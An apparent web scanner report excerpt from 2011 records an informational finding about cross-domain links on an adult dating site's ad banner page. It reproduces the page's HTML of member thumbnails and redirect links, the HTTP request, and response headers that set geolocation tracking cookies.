<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1ZjVMTUgwT2dZQUlnOUFnQzV1UlFBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/IY/jZiYAzwLDi7q8xZK0fsH5w.jpg" width="120" height="160" alt="No Photo" title="tiffhot4u" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1ZjVMTUgwT2dZQUlnOUFnQzV1UlFBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">tiffhot4u</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1ZjVMTUgwT2dZQUlnOUFnQzV1UlFBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1Wm1WWUZpRDBDQU5Eb0dBQzV1UlFBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://piclist.pop6.com/ffadult/featured/external/photos/6W/so6wDfo8vKHBmdtACniLFw.jpg" width="120" height="160" alt="No Photo" title="sexy111198" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1Wm1WWUZpRDBDQU5Eb0dBQzV1UlFBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">sexy111198</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1Wm1WWUZpRDBDQU5Eb0dBQzV1UlFBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U0dUlhOE51YmtVQUlnOUFnRFE2QmdBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://photos.pop6.com/ffadult/featured/external/photos/2S/Jh2SP96FU7fUR0SLueSP3cKxA.jpg" height="160" width="120" alt="No Photo" title="foxy_lady81" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U0dUlhOE51YmtVQUlnOUFnRFE2QmdBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">foxy_lady81</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U0dUlhOE51YmtVQUlnOUFnRFE2QmdBaVZNWEFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U0Snh4b2lpVk1YQUxtNUZBQ0lQUUlBME9nWUFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/BG/efBGOsdjl7tbAdfQcgQtpA.jpg" width="120" height="160" alt="No Photo" title="bidaisy22" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U0Snh4b2lpVk1YQUxtNUZBQ0lQUUlBME9nWUFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">bidaisy22</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U0Snh4b2lpVk1YQUxtNUZBQ0lQUUlBME9nWUFJYzlBZ0JRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1Z1JCWVNoejBDQUlsVEZ3QzV1UlFBaUQwQ0FORG9HQUJRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://piclist.pop6.com/ffadult/featured/external/photos/IU/KbiULWfbB5HSPcJYsX6MxhQ.jpg" width="120" height="160" alt="No Photo" title="PRETTYSPOILED" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1Z1JCWVNoejBDQUlsVEZ3QzV1UlFBaUQwQ0FORG9HQUJRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">PRETTYSPOILED</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1Z1JCWVNoejBDQUlsVEZ3QzV1UlFBaUQwQ0FORG9HQUJRRnhjQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="120" height="160" id="loovyloo" align="middle">
<param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="movie" value="http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160/PG_gloria_120x160.swf" />
<embed src="http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160/PG_gloria_120x160.swf" flashvars="target=_blank&go_url=http%3A%2F%2Fmedleyads.com%2Fspot%2Fc%2F1313434555%2F1247371422%2F13190.html%3FMD%3DaHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1SE5fQVRVQmNYQUljOUFnQ0pVeGNBdWJrVUFJZzlBZ0RRNkJnQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ%3D%3D%26creative%3Dpiclist_horizontal" bgcolor="#ffffff" wmode="opaque" quality="high" allowScriptAccess="always" width="120" height="160" name="loovyloo" align="middle" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
...[SNIP]...
<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1SE5fQVRVQmNYQUljOUFnQ0pVeGNBdWJrVUFJZzlBZ0RRNkJnQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==%26creative%3Dpiclist_horizontal" target="_blank">loovyloo</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1SE5fQVRVQmNYQUljOUFnQ0pVeGNBdWJrVUFJZzlBZ0RRNkJnQXVwQUNBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==%26creative%3Dpiclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1UVdHWUF1cEFDQUZBWEZ3Q0hQUUlBaVZNWEFMbTVGQUNJUFFJQTBPZ1lBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://piclist.pop6.com/ffadult/featured/external/photos/0A/uI0A2th9oZDYWzSP8o9TSLOg.jpg" width="120" height="160" alt="No Photo" title="smoothsoftnsweet" /></a>


<div>

<a class="handle" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1UVdHWUF1cEFDQUZBWEZ3Q0hQUUlBaVZNWEFMbTVGQUNJUFFJQTBPZ1lBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank">smoothsoftnsweet</a>
...[SNIP]...
<br />
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNclZ0U1U1UVdHWUF1cEFDQUZBWEZ3Q0hQUUlBaVZNWEFMbTVGQUNJUFFJQTBPZ1lBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><span class="location">
...[SNIP]...
<div id="logo">
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" title="bookofsex.com" target="_blank"><img src="http://graphics.pop6.com/banners/bookofsex.com/26400_logo.png" border="0" width="218" height="35" alt="" /></a>
</div>

<div id="text">
<a id="text" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" target="_blank" title="Click here for more.">the adult social network</a>
...[SNIP]...
<div id="btn">
<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" title="Click here for more." target="_blank"><img src="http://graphics.pop6.com/banners/bookofsex.com/26400_joinbtn.png" border="0" width="105" height="32" alt="" /></a>
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=2316&site=ffadult&session=G%3C%3A%3C%5D%40DQN%5B%3EL+1313434558+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1934513.submad_24810_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

13.12. http://banners.bookofsex.com/go/page/iframe_cm_26400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:59 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,auy/Hn8z06UROlnTRnsrjRPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24781
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<meta http-equiv="Content-Location" content="http://banners.bookofsex.com/go/page/iframe_cm_26400&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html" />
<link rel="stylesheet" type="text/css" href="http://graphics.pop6.com/images/ffadult/css/header.css" />
<link rel="shortcut icon" type="image/x-icon" href="http://graphics.pop6.com/images/bookofsex.com/favicon.ico" />
<link rel="meta" href="http://graphics.pop6.com/images/ICRA_labels_rdf_adult.rdf" type="application/rdf+xml" title="ICRA labels" />
<meta http-equiv="pics-Label" content='(pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l gen true for "http://bookofsex.com" r (n 3 s 3 v 0 l 3 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen tr
...[SNIP]...
<div id="geotext">
<a id="text" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" target="_blank" title="Click here for more.">Hookup with members near <span>
...[SNIP]...
<span class="title" >Meet <a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcw==" target="_blank">bookofsex.com</a> members near <a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcw==" target="_blank">Dallas</a>
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


<a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcyYmcGljaWQ9MmFuc1hNc0JyU1U0RGhQd3l2NDRYQU1EaEdBREo0UmdBSDYwQkFNampGUUNPX1JnQWdTc1hBQS0tJmhyPWFIUjBjRG92TDIxbFpHeGxlV0ZrY3k1amIyMHZjM0J2ZEM4MU1qTXlMbWgwYld3PQ==&creative=piclist_horizontal" target="_blank"><img style="border: 0 transparent none;" src="http://graphics.pop6.com/ffadult/featured/external/photos/CV/gCCvOAHn2JWpM5X1zE9gQA.jpg" width="120" height="160" alt="No Photo" title="tallme1" /></a>


<div>

